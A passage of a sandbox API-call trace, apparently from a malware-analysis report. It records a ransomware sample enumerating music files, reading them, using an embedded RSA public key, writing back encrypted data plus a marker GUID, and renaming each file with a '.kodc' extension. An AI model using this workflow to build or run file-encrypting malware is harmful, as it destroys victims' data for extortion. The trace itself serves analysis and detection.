| out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.951] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.952] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.952] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.952] CloseHandle (hObject=0x5cc) returned 1 [0101.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x32d0db8 [0101.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.954] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\8yEpsB_ctagmhD.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\8yepsb_ctagmhd.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\8yEpsB_ctagmhD.m4a.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\8yepsb_ctagmhd.m4a.kodc")) returned 1 [0101.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.955] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.956] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9da9780, ftCreationTime.dwHighDateTime=0x1d5beb9, ftLastAccessTime.dwLowDateTime=0x1c6a48e0, ftLastAccessTime.dwHighDateTime=0x1d5c446, ftLastWriteTime.dwLowDateTime=0x1c6a48e0, ftLastWriteTime.dwHighDateTime=0x1d5c446, nFileSizeHigh=0x0, nFileSizeLow=0x74ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aboV04qPctQvBmOw.wav", cAlternateFileName="ABOV04~1.WAV")) returned 1 [0101.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\aboV04qPctQvBmOw.wav") returned=".wav" [0101.957] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\aboV04qPctQvBmOw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\abov04qpctqvbmow.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.957] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=29867) returned 1 [0101.957] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.961] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7485, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.961] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.962] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.962] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x74ab, lpOverlapped=0x0) returned 1 [0101.962] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.962] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.962] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.962] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.963] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.963] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.963] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.963] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.964] GetLastError () returned 0x0 [0101.964] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.964] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.964] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.964] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.964] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x74b0) returned 0x9ba8d90 [0101.964] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb65e0 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81f0 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6628 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8208 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8238 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8250 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.965] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8238 | out: hHeap=0x630000) returned 1 [0101.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8250 | out: hHeap=0x630000) returned 1 [0101.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0101.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8250 [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8238 [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8250 | out: hHeap=0x630000) returned 1 [0101.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8238 | out: hHeap=0x630000) returned 1 [0101.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.966] GetCurrentThreadId () returned 0x42c [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x332c948 [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.967] GetCurrentThreadId () returned 0x42c [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8238 [0101.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0101.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8250 [0101.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8220 [0101.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.969] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x74ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.001] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0102.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0102.001] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0102.001] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0102.001] CloseHandle (hObject=0x5cc) returned 1 [0102.003] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\aboV04qPctQvBmOw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\abov04qpctqvbmow.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\aboV04qPctQvBmOw.wav.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\abov04qpctqvbmow.wav.kodc")) returned 1 [0102.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0102.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0102.004] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0102.005] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfcb0dd0, ftCreationTime.dwHighDateTime=0x1d5c387, ftLastAccessTime.dwLowDateTime=0x7d117730, ftLastAccessTime.dwHighDateTime=0x1d5be52, ftLastWriteTime.dwLowDateTime=0x7d117730, ftLastWriteTime.dwHighDateTime=0x1d5be52, nFileSizeHigh=0x0, nFileSizeLow=0xb243, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bg-t2NyhqrG.m4a", cAlternateFileName="BG-T2N~1.M4A")) returned 1 [0102.005] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\bg-t2NyhqrG.m4a") returned=".m4a" [0102.005] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\bg-t2NyhqrG.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\bg-t2nyhqrg.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0102.006] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=45635) returned 1 [0102.006] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0102.009] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb21d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.009] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0102.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0102.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0102.010] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.010] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xb243, lpOverlapped=0x0) returned 1 [0102.011] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0102.011] lstrlenA (lpString="-----BEGIN PUBLIC 